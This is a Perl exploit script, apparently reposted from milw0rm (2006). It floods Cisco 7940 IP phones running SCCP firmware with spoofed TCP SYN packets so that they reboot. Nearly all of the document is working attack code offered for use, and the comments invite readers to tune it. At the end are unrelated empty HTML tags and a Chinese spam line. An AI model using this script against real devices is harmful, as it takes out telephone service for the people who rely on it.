#!/usr/bin/perl # This is made for trashing cisco 7940 ip phones. kokanin made/discovered this. # A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my # phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!! # not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny # protocol - this is not for the SIP firmware. use Net::RawIP; use Time::HiRes; $pkt = new Net::RawIP; die "Usage $0 " unless ($ARGV[4]); $pkt->set({ ip => { saddr => $ARGV[0], daddr => $ARGV[1] }, tcp=> { dest => $ARGV[2], syn => 1, seq => 0, ack => 0} }); for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; }; # milw0rm.com [2006-01-10]

    <pre id="vvttv"><mark id="vvttv"><progress id="vvttv"></progress></mark></pre>
    <pre id="vvttv"></pre>

      <p id="vvttv"></p>

          <p id="vvttv"></p>

                <p id="vvttv"></p>

                <pre id="vvttv"><cite id="vvttv"><progress id="vvttv"></progress></cite></pre>

                  <output id="vvttv"><dfn id="vvttv"><th id="vvttv"></th></dfn></output>

                    <p id="vvttv"></p>

                    这里只有精品视频